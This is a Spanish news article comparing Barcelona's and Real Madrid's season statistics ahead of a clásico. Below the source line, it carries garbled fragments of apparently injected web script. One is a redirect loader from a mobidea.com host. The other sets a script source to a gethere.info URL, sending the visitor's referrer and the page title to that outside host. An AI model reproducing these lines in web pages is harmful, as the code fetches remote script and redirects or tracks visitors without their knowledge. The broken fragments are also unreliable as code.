Barcelona supera en todos los sentidos al Real Madrid

Como nunca en los últimos años, Barcelona y Real Madrid llegan al gran clásico de España con una clara diferencia a favor de uno de los dos. Pero no se trata únicamente de que el conjunto catalán le lleva diez puntos de diferencia a su máximo rival en la tabla de posiciones: la mayor ventaja que tiene el equipo de Luis Enrique sobre el de Zinedine Zidane es futbolística. El contundente 4-0 que consiguió el líder en el Santiago Bernabéu en el duelo de la primera vuelta de la Liga marcó la primera gran disparidad entre ambos. Y las distancias se acrecentaron a medida que avanzó la temporada: mientras los culés construían el mayor invicto de la historia del futbol ibérico, el Merengue se quedó sin entrenador y todavía intenta enderezar el rumbo.

 Las disímiles realidades de ambos conjuntos de cara al duelo del sábado en el Camp Nou quedan al descubierto al analizar las estadísticas: los números muestran que Barcelona es más que Real Madrid en cada uno de los aspectos relevantes de juego. El equipo de Luis Enrique tiene mejor promedio de posesión que su rival (66,31% contra 58,33%), repartió muchos más pases correctos (16.327 contra 14.805) y hasta lleva más gambetas que la Casa Blanca (393 contra 362).

Desde los datos duros, el Madrid es más goleador que el Barça, con 87 tantos a favor contra 86. Sin embargo, al analizar un poco más en profundidad se observa que el conjunto blanco necesitó de 577 para anotar sus goles, mientras que el cuadro catalán precisó de 477. En otras palabras: el equipo culé marca cada 5,55 remates, mientras que el equipo de Zidane lo hace cada 6,63.

En defensa, lo del conjunto de Luis Enrique también es superior: no solamente tiene menos goles en contra (24 frente a 28), sino que le patearon menos veces al arco (303 contra 342) y terminó en más ocasiones con la valla invicta (13 contra 10). Desde lo disciplinario, también hay ventaja para el blaugrana: cometió menos faltas (287 contra 333), acumula menos tarjetas amarillas (50 y 52) y también menos rojas (1 frente a 4).

Si se considera solamente a los tridentes de ataque de cada uno, la tendencia continúa. Lionel Messi, Luis Suárez y Neymar suman 69 tantos, contra 63 de Cristiano Ronaldo, Karim Benzema y Gareth Bale. Y en las asistencias la distancia es mayor: los de Barcelona repartieron 32, contra 21 de los del Real. Además, la Pulga y el brasileño llevan más del doble de pases que el francés y el galés (1076 y 1153 de los culés contra 411 y 416 de los del Madrid).

Los números, está claro, juegan a favor del conjunto catalán. Sin embargo, cuando la pelota empiece a rodar, la matemática se quedará sentada en un rincón y disfrutará de la impredecible magia de la pelota. Como lo hará todo fanático del balompié ante el clásico más relevante del planeta.

Fuente: Goal.com

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios